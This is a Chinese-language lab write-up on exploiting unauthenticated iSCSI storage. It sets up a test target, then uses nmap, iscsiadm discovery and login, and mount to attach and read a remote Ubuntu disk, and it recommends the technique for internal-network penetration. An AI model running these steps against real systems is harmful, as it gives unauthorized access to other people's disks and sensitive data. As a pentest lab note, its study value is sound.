Hacking iSCSI

前几日看到入侵 Hacking Team 的文章，其中最大的一个突破口就是 iSCSI 未授权访问。那么，什么是 iSCSI，又如何在内网渗透的时候利用 iSCSI 获取敏感信息？于是嗯哼，做笔记呗..
PS: 虽然题目起了一个 Hacking iSCSI，但是实际上就是一个未授权访问而已。
如果有兴趣可以了解一下什么是 SCSI 协议，以及什么是 iSCSI。

0x00

服务端

IP: 10.211.55.18  
OS: Ubuntu

为了减少水表几率，我还是一个内网的 iSCSI 环境比较好。
首先安装 iscsitarget：

apt-get install iscsitarget

修改 /etc/default/iscsitarget：

# cat /etc/default/iscsitarget
 ISCSITARGET_ENABLE=true
 ISCSITARGET_MAX_SLEEP=3


 # ietd options
 # See ietd(8) for details
 ISCSITARGET_OPTIONS=""

修改 /etc/iet/ietd.conf：

Target iqn.2016-04.local.test:storage
Lun 1 Path=/dev/sda,Type=fileio,ScsiId=lun1,ScsiSN=lun1

接着重启服务：

# service iscsitarget restart
 * Removing iSCSI enterprise target devices:           [ OK ]
 * Starting iSCSI enterprise target service            [ OK ]

运行 netstat -anp | grep 3260 发现已经开启服务了。

# netstat -anp | grep 3260
 tcp        0      0 0.0.0.0:3260            0.0.0.0:*               LISTEN      7265/ietd
 tcp6       0      0 :::3260                 :::*                    LISTEN      7265/ietd

客户端

IP: 10.211.55.20
OS: CentOS

安装 scsi-target-utils：

yum install scsi-target-utils

0x01

以下为过程：

[root@localhost yum.repos.d]# nmap 10.211.55.18 -p3260

Starting Nmap 5.51 ( http://nmap.org ) at 2016-04-21 19:03 HKT
Nmap scan report for 10.211.55.18
Host is up (0.00031s latency).
PORT     STATE SERVICE
3260/tcp open  iscsi
MAC Address: 00:1C:42:D8:D3:48 (Parallels)

Nmap done: 1 IP address (1 host up) scanned in 13.42 seconds

发现已经开始 3260 端口，接着用 iscsiadm -m discovery 获取 iqn（iSCSI Qualified Name）。

[root@localhost tmp]# iscsiadm -m discovery -t sendtargets -p 10.211.55.18
10.211.55.18:3260,1 iqn.2016-04.local.test:storage

利用 iscsiadm 挂载：

[root@localhost yum.repos.d]# iscsiadm -m node -T iqn.2016-04.local.test:storage -p 10.211.55.18 -l
Logging in to [iface: default, target: iqn.2016-04.local.test:storage, portal: 10.211.55.18,3260] (multiple)
Login to [iface: default, target: iqn.2016-04.local.test:storage, portal: 10.211.55.18,3260] successful.

fdisk -l 检测是否已经存在：

[root@localhost yum.repos.d]# fdisk -l
...

Disk /dev/sdb: 68.7 GB, 68719476736 bytes  <-- HERE!
255 heads, 63 sectors/track, 8354 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x0009be13

   Device Boot      Start         End      Blocks   Id  System
/dev/sdb1   *           1        8225    66059264   83  Linux
/dev/sdb2            8225        8355     1046529    5  Extended
/dev/sdb5            8225        8355     1046528   82  Linux swap / Solaris
[root@localhost yum.repos.d]#

接着挂载：

[root@localhost tmp]# mkdir /tmp/test
[root@localhost tmp]# mount  /dev/sdb1 /tmp/test/
[root@localhost tmp]# cd /tmp/test/etc
[root@localhost tmp]# cat issue
Ubuntu 12.04.5 LTS \n \l

发现已经挂在了 Ubuntu 的硬盘。

如上所示，如果在内网中发现开启的 3260 端口，可以尝试挂载其硬盘。可以获取很多敏感信息。其中 Hacking Team 就是因为泄露了邮件服务器导致 boom。

Reference

• http://jingyan.baidu.com/article/915fc414eb528d51394b20cc.html
• http://www.cnblogs.com/mchina/p/centos-iscsi-network-storage.html
• http://blog.chinaunix.net/uid-20940095-id-3487049.html
• http://drops.wooyun.org/pentesting/15117